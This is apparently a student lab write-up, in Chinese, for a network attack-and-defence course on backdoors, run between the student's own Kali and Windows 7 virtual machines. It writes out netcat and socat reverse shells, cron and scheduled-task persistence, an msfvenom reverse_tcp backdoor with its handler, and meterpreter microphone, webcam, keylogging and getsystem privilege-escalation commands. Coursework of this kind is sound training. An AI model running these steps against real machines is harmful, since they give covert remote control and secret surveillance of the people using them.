实验内容

1.使用netcat获取主机操作Shell,cron启动

2.使用socat获取主机操作Shell, 任务计划启动

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 网站捆绑下载

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 修改注册表,添加自启动、修改正常软件快捷方式的启动路径

(3)Meterpreter有哪些给你映像深刻的功能?

  • 夺取开启摄像头、麦克风等设备权限,读取键盘内容

(4)如何发现自己有系统有没有被安装后门?

  • 电脑安全软件扫描、查看自启项有无异常程序

实验过程

常用后门工具测试

ncat

Linux获得Windows Shell
  • 首先在查看kali虚拟机的IP地址ifconfig(这里和win的ipconfig有所区别)

  • kali使用nc指令监听端口:nc -l -p 5231
  • Windows上使用ncat.exe程序的-e选项项反向连接Kali主机的端口:ncat.exe -e cmd.exe 192.168.70.131 5231
  • kali:获得win7 Windows Shell

Windows获得Linux Shell
  • Windows:使用ipconfig指令查看本机IP:192.168.70.130

  • 使用ncat.exe程序监听本机的端口:ncat.exe -l -p 5231
  • kali:使用nc指令的-e选项反向连接Windows主机的端口:ncat 192.168.70.130 5231 -e /bin/sh
  • Windows获取kali shell

用nc传输数据
  • 在Windows下监听端口:ncat.exe -l 5231
  • kali下连接到Windows的端口:nc 192.168.70.130 5231

    之后就可以双向传输文字
用nc传输文件
  • Windows下监听端口,把收到的数据保存到wyhy.out中:ncat.exe -l 5231 > wyhy.out
  • kali下先创建wyhy.in文件,再反弹连接到Windows的端口:nc 192.168.70.130 5231 < wyhy.in

    传输成功后kali里创建的文件的内容就会在Windows同名文件中出现。



1、使用netcat获取主机操作Shell,cron启动

先在win7系统下,监听端口:ncat.exe -l -p 5231

在kali下,使用man cron查看crontab命令的帮助文档



  • crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

crontab -e指令编辑一条定时任务



在最后一行添加18 * * * * /bin/netcat 192.168.70.131 -e /bin/sh,意思是在每个小时的第18分钟反向连接Windows主机的端口

在时间没到的时候无论你在Windows那边怎么输都是没有反应的,但是在时间到的一刻你输入的所有都会瞬间显示在频幕上


2、使用socat获取主机操作Shell, 任务计划启动

  • 在Windows系统下,打开控制面板>系统和安全>管理工具>任务计划程序>创建任务在触发器选项开始任务选项选择工作站锁定时



    在操作选项卡填入socat的路径,参数填tcp-listen:XX exec:cmd.exe,pty,stderr(XX为自己设定端口号)

创建完成后锁定Windows,然后去kali

在kali输入socat - tcp:windows IP:端口号此时可以发现已经成功获得了一个cmd shell(这里可能需要做两次,Windows初次使用socat会有弹窗提示是否允许使用网络,然而你锁了Windows啥都不知道,不成功就倒回去Windows看看吧)

3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=XXXX -f exe > 20165231_backdoor.exe生成后门

在Windows下执行ncat.exe -l 5231 > 20165231_backdoor.exe,被控主机进入接收文件模式



在kali中通过nc windows ip:XXXX < 20165230_backdoor.exe将生成的后门程序传送到Windows主机上

在kali上使用msfconsole指令进入msf控制台

设置监听模块

use exploit/multi/handler //使用监听模块,设置payload

set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload

set LHOST 192.168.70.131 //这里用的是LinuxIP,和生成后门程序时指定的IP相同

set LPORT 5231 //同样要使用相同的端口


设置完成后,执行监听exploit然后在Windows上双击之前生成的文件

此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令截获一段音频



使用webcam_snap指令可以使用摄像头进行拍照:



使用webcam stream指令可以使用摄像头进行录像:

使用screenshot指令可以进行截屏:

使用keyscan_start指令开始,在windows中记录下击键的过程,使用keyscan_dump指令读取击键的记录:

先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

实验遇到的问题

1、使用MSF meterpreter调用摄像头时显示操作失败:1411

解决:虚拟机关联到物理机的摄像头,在VM虚拟机右下加有个U盘标志,右键连接就关联上物理机上的设备了。如果右下角没有U盘标志,那就在虚拟机设置里面添加就ok了。



实验感想

我以前一直以为只要防火墙,安全软件安好就一定不会有什么被入侵的可能。看来我还是太年轻了,我们这种初学的小米渣在win7没关防火墙情况下都能依葫芦画瓢完成渗透,若不是摄像头启动有指示灯,神不知鬼不觉都被拍了。不过对于目前的渣渣技术想要完全渗透到别人的系统里除了这些技术看来还得用上社会工程学才能得手啊。

2018-2019-2 网络对抗技术 20165231 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. Git使用注意事项

    第一次用git时push时,突然想到我没有设置ssh key,却也可以push代码到自己仓库,那我本地登陆的账号Git是存在哪儿了呢? Git本地账户凭证管理 在第一次push到远程仓库时,git会提 ...

  2. input type类型和input表单属性

    一.input type类型 1.Input 类型 - email 在提交表单时,会自动验证 email 域的值. E-mail: <input type="email" n ...

  3. I used to know

    曾经我以为, 这世上满是痛苦. 必须靠坚强过活, 必须在深夜的被窝里默默痛哭. 后来我才发现, 这个世上, 只有快乐.

  4. VSCode python 遇到的问题:vscode can't open file '<unprintable file name>': [Errno 2] No such file or directory

    代码很简单,就两行: import pandas as pd import netCDF4 as nc dataset = nc.Dataset('20150101.nc') 环境:在VSCode中左 ...

  5. Mysql 中的日期时间字符串查询

    一.将数据库中的Date格式的数据,或者指定日期的字符串格式化为想要的样式 DATE_FORMAT (date, format)能根据格式串format 格式化日期或日期和时间值date,返回结果字符 ...

  6. Vue—组件传值及vuex的使用

    一.父子组件之间的传值 1.父组件向子组件传值: 子组件在props中创建一个属性,用以接收父组件传来的值 父组件中注册子组件 在子组件标签中添加子组件props中创建的属性 把需要传给子组件的值赋给 ...

  7. Java中newInstance()和new()区别

    前言: 最近在看springIOC和AOP是看见代码中很实用newInstance来实例化一个对象,之前对newInstance和new实例化对象的区别很模糊,特意在这里记录一下 一.newInsta ...

  8. pstree:command not found

    centos7默认并没有安装pstree,所以会有pstree:command not found yum -y install psmisc

  9. Java 异常体系(美团面试)

    Java把异常作为一种类,当做对象来处理.所有异常类的基类是Throwable类,两大子类分别是Error和Exception. 系统错误由Java虚拟机抛出,用Error类表示.Error类描述的是 ...

  10. Linux学习之路2-linux系统烧写

    fastboot烧写方式 准备工作: 硬件– 串口线连接开发板串口con3到PC的串口– OTG线连接开发板的OTG接口和PC的USB接口软件– 串口工具(超级终端),默认波特率为115200– 烧写 ...